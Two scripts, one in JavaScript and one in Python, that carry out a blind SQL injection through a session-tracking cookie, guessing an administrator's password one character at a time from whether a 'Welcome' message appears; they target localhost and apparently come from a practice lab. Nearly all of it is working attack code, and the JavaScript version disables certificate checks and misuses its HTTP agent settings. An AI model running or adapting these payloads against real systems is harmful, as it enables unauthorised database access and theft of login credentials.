File: blind-injection.js
const axios = require('axios');
const querystring = require('querystring');

const httpsAgent = new axios.create({
  httpsAgent: new require('https').Agent({  
    rejectUnauthorized: false
  })
});

const proxies = {
  http: 'localhost:3000/check-session',
  https: 'localhost:3000/check-session'
};

async function sqliPassword(url) {
  let passwordExtracted = "";
  for (let i = 1; i <= 20; i++) {
    for (let j = 32; j < 126; j++) {
      const sqliPayload = `' and (select ascii(substring(password,${i},1)) from users where username='administrator')='${j}'--`;
      const sqliPayloadEncoded = querystring.escape(sqliPayload);
      const cookies = `TrackingId=dCqiyv8E4BfhhpHL${sqliPayloadEncoded}; session=bdb4dZfXEcfucciq98jCIYBJW4NL7y7M`;

      try {
        const response = await httpsAgent.get(url, {
          headers: { 'Cookie': cookies },
          proxy: false,
          httpsAgent: proxies.https
        });
        if (!response.data.includes("Welcome")) {
          process.stdout.write(`\r${passwordExtracted}${String.fromCharCode(j)}`);
        } else {
          passwordExtracted += String.fromCharCode(j);
          process.stdout.write(`\r${passwordExtracted}`);
          break;
        }
      } catch (error) {
        console.error('Error during HTTP request:', error.message);
        return;
      }
    }
  }
}

function main() {
  const args = process.argv.slice(2);
  if (args.length !== 1) {
    console.log('(+) Usage: node script.js <url>');
    console.log('(+) Example: node script.js www.example.com');
    return;
  }
  
  const url = args[0];
  console.log('(+) Retrieving administrator password...');
  sqliPassword(url);
}

if (require.main === module) {
  main();
}

File: blind-injection.py
import requests
import urllib.parse

def brute_force_password():
    url = "http://localhost:3000/check-session"
    password = ""
    # assume the length of the password is at most 18
    for i in range(1, 19): 
        found = False
        for j in range(33, 127):  
            injection_payload = f"' and ascii(substring((select password from users where username='admin'),{i},1))='{j}'--'"
            encoded_payload = urllib.parse.quote(injection_payload)
            cookies = {'cookie_id': '7g.G2!xFopZMPdJ' + encoded_payload}
            r = requests.get(url, cookies=cookies, verify=False)
            if "Welcome back" in r.text:
                password += chr(j)
                print(f"\rPassword so far: {password}", end='')
                found = True
                break
        if not found:
            print("\nPassword retrieval complete.")
            break

def main():
    print("Start brute force retrieving password...")
    brute_force_password()

if __name__ == "__main__":
    main()

